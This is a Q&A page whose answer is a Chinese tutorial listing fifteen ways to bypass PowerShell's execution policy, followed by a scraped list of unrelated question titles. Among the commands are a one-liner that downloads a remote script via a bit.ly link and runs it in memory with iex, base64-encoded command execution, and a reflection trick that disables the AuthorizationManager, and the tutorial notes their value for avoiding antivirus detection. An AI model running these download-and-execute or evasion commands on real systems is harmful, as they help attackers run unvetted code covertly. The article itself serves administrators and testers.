问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

哪些方法可以绕过PowerShell Execution Policy

发布网友 发布时间:2022-05-02 03:26

我来回答

1个回答

热心网友 时间:2022-06-27 16:17

默认情况下,PowerShell禁止PowerShell脚本在Windows系统中执行。这会妨碍渗透测试员,系统管理员,和开发人员……在这里我将在没有系统管理员权限的情况下通过15个方法来绕过PowerShell execution policy。

我肯定还有很多的技术漏了(或者我根本不知道),但希望这篇文章将给需要它的人提供一个良好的开端。

什么是PowerShell Execution Policy?

PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下,它是“ Restricted ”(*)的。然而,这个设置从来没有算是一种安全控制。相反,它会阻碍管理员操作。这就是为什么我们有这么多绕过它的方法。包括一些微软提供的。更多关于在PowerShell执行*设置,默认的安全控制的设置。我建议阅读Carlos Perez的 博客 。他提供了一个很好的概述。

为什么要绕过执行*?

我听到的最多的原因是因为人们希望实现自动化操作,但下面还有一些其他原因致使PowerShell在管理员、渗透测试员、黑客们手中如此流行:
支持Windows
能调用Windows API
能在不写入磁盘的情况下运行命令
能避免病毒的检测
总是被标记为"信任"。是大部分应用程序的白名单一员。
曾写出过许多的开源渗透测试工具包

如何查看Execution Policy

在能够使用所有完美功能的PowerShell之前,攻击者可以绕过“Restricted”(*)execution
policy。你可以通过PowerShell命令“executionpolicy“看看当前的配置。如果你第一次看它的设置可能设置为
“Restricted”(*),如下图所示
PS C:> Get-ExecutionPolicy

同样值得注意的是execution policy可以在系统中设置不同的级别。要查看他们使用下面的命令列表。更多信息可以点击这里查看微软的“Set-ExecutionPolicy” 。
Get-ExecutionPolicy -List | Format-Table -AutoSize

实验环境说明

在下面的例子中我将使用一个名为runme.ps1的脚本,它将包含以下PowerShell命令来写出一个消息到控制台:
Write-Host "My voice is my passport, verify me."

当我试图在一个带有默认execution policy的系统上执行它时,我得到以下错误:

如果你目前的execution
policy是开放的,你想让它更严格的测试,下面的技巧,然后从管理员PowerShell控制台运行命令“Set-ExecutionPolicy
Restricted”。OK,那我接着BB了,接下来我会通过15种方法来绕过PowerShell execution policy的*。

绕过PowerShell Execution Policy

1. 把脚本直接粘贴到交互式的PowerShell控制台

复制并粘贴你的PowerShell脚本为一个交互式控制台如下图所示。但是,请记住,你将被当前用户权限*。这是最基本的例子,当你有一个交互控制台时,可以方便快速地运行脚本。此外,这种技术不会更改配置或需要写入磁盘。

2. Echo脚本并PowerShell的标准输入

简单的ECHO脚本到PowerShell的标准输入。这种技术不会导致配置的更改或要求写入磁盘。
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. 从文件中读取脚本并通过PowerShell的标准输入

使用Windows的"type"命令或PowerShell的"Get-Content"命令来从磁盘读取你的脚本并输入到标准的
PowerShell中,这种技术不会导致配置文件的更改,但是需要写入磁盘。然而,如果你想试图避免写到磁盘,你可以从网络上读取你的脚本。

例1:Get-Content Powershell命令
Get-Content .runme.ps1 | PowerShell.exe -noprofile -

例2:Type 命令
TYPE .runme.ps1 | PowerShell.exe -noprofile -

4. 从网络上下载脚本并通过IEX执行它

这种技术可以用来从网上下载一个PowerShell脚本并执行它无需写入磁盘。它也不会导致任何配置更改。我已经看到它有许多创造性的使用方法,但最近看到它被引用到一个不错的Matt Graeber的PowerSploit博客上。
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

5. 使用Command

这种技术和通过复制和粘贴来执行一个脚本是非常相似的,但它可以做没有交互式控制台。这是很好的方式适合执行简单的脚本,但更复杂的脚本通常容易出现错误。这种技术不会导致配置更改或要求写入磁盘。

例1:完整的命令
Powershell -command "Write-Host 'My voice is my passport, verify me.'"

例2:简短的命令
Powershell -c "Write-Host 'My voice is my passport, verify me.'"

6. 使用EncodeCommand

这和使用"Command"命令非常像,但它为所有的脚本提供了一个Unicode /
Base64编码串。通过这种方式加密你的脚本可以帮你绕过所有通过"Command"执行时会遇到的错误。这种技术不会导致配置文件的更改或要求写入磁
盘。下面的示例来自 Posh-SecMod。

例1: 完整的命令
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

例2: 通过简短的命令使用编码串
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. 使用Invoke-Command命令

我在obscuresec的博客看到了这种有趣的方法。这是一个典型的通过交互式PowerShell控制台执行的方法。但最酷的是当PowerShell远程处理开启时我可以用它来对远程系统执行命令。这种技术不会导致配置更改或要求写入磁盘。
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}

基于obscuresec博客,下面的命令还可以用来抓取从远程计算机的execution policy并将其应用到本地计算机。
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. 使用Invoke-Expression命令

这是另一个典型的通过交互式PowerShell控制台执行的方法。这种技术不会导致配置更改或要求写入磁盘。下面我列举了一些常用的方法来通过Invoke-Expression绕过execution policy。

例1:使用Get-Content的完整命令
Get-Content .runme.ps1 | Invoke-Expression

例2:使用Get-Content的简短的命令
GC .runme.ps1 | iex

9.使用"Bypass"标记Execution Policy

当你通过脚本文件执行命令的时候这是一个很好的绕过execution policy的方法。当你使用这个标记的时候"没有任何东西被阻止,没有任何警告或提示"。这种技术不会导致配置更改或要求写入磁盘。
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1

10. 使用"Unrestricted"标记Execution Policy

这类似于"Bypass"标记。当你使用这个标记的时候,它会"加载所有的配置文件并运行所有的脚本。如果你运行从网上下载的一个未被签名的脚本,它会提示你需要权限",这种技术不会导致配置的更改或要求写入磁盘。
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1

11. 使用 "Remote-Signed"标记Execution Policy

创建你的脚本,然后按照教程的操作。最后,使用下面的命令运行它:
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. 通过交换AuthorizationManager禁用ExecutionPolicy

这真是一个我碰到的来自http://www.nivot.org的创意。下面的函数可以通过一个交互式的PowerShell来执行。一旦函数
被调用"AuthorizationManager"就会被替换成空。最终结果是,接下来的会话基本上不受execution
policy的*。然而,它的变化将被应用于会话的持续时间。
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy .runme.ps1

13. 把ExcutionPolicy设置成Process Scope

正如我们在引言中所看到的,执行策略可以应用于多层次的。这包括你控制的过程。使用这种技术,执行策略可以被设置为您的会话的持续时间不受*。此外,它不会导致在配置更改,或需要写入到磁盘。我最初发现这种技术来自r007break博客。
Set-ExecutionPolicy Bypass -Scope Process

14. 通过命令设置ExcutionPolicy为CurrentUser Scope

这种方法和上面那种类似。但是这种方法通过修改注册表将当前用户环境的设置应用到当前用户的环境中。此外,它不会导致在配置更改,或需要写入到磁盘。我最初发现这种技术来自r007break博客。
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. 通过注册表设置ExcutionPolicy为CurrentUser Scope

在这个例子中,我展示了如何通过修改注册表项来改变当前用户的环境的执行策略。
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell

总结
我觉得这里的主题是:使用的execution policy不一定是开发商,管理员,或者。微软从来没有打算将它成为一个安全控制。这就是为什么有这么多选择绕过它。微软很好地提供了一些本地选项和安全社区也拿出一些真正有趣的把戏。
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
亲肤绒与猫抓布,哪款面料做沙发好? 我需要 天津大学_高等数学(上下册)_蔡高厅,有这个的百度网盘吗? 蔡高厅讲的高数是哪版教材 自考高等数学工专如何学 2022情侣必备的经典感恩节祝福语 送给爱人的感恩节祝福语 感恩节给爱人祝福语 如何下载小升初数学试卷 请问各位朋友,有哪些好网站,上面有各地优秀的小升初的数学试卷? 民生信用卡什么合适 如何豁免创新药物生物等效性试验 电脑有捆绑软件怎么办? 有哪些亲测有效的句子,可以缓解聊天冷场的尴尬? 高温对水基钻井液性能的影响 聊天的时候总是冷场,怎么办? 怎样在Excel中编制生物等效性评价程序 如何查看捆绑软件是从哪里捆绑的? 冷场表情包 就没人理他一下么 如何开展生物等效性研究 浏览了非法网站,结果下了一些*软件,有些卸了,有些找不到了,我怀疑电脑里有恶意软件,该如何解决? 合金粉末怎样进行电学性能和磁学性能的测试 简述使用超声波探伤判断金属内部裂纹的方法? 如何在电脑上找到并清除捆绑软件 无损检测ABS跟API 7K要求的标准有什么区别 电脑开机自动安装了流氓软件:搜狐影音、豌豆荚、多彩便签,如何查出是被哪个软件*的? 电脑上如何找到捆绑软件 高生物利用度对药物的溶解性和渗透性有什么要求 需要调研一款超低渗透率测量仪,哪位有经验的大神帮忙普及下这方面 人类一败涂地手机版人类跌落梦境有辅助吗? 我在steam上下载了《人类一败涂地》,购买下载安装都没问题,但是就是打不开,是要下载什么辅助插件吗? 什么是电脑捆绑软件? 怎么破解冷场? 股市技术指标混合使用的意义和优势(相对于使用单一指标而言)? 怎样综合利用股票技术指标? 京剧脸谱课Ļ 如何运用技术指标炒股 小学一年级如何读懂京剧脸谱 脸谱和京剧有什么区别 了解京剧和脸谱30字 对于京戏脸谱的文化,大家了解的有哪些? 乌江三峡百里画廊有些什么特色 乌江三峡百里画廊简介哪儿有 初一上人教版语文半期!急救!!! 武隆乌江画廊怎么样 重庆最牛文化名镇,乌江画廊的核心景点,是适合散心的地方吗? 来游乌江画廊旅游,应该怎么玩? 乌江画廊好不好玩,准备跟同学一起去,问下去过的人,乌江画廊感觉怎么样啊? 你知道舟行碧波上,人在画中游说的是哪里吗? 重庆的乌江画廊到底是指哪一段? 写涪陵哪些风景区很美怎么写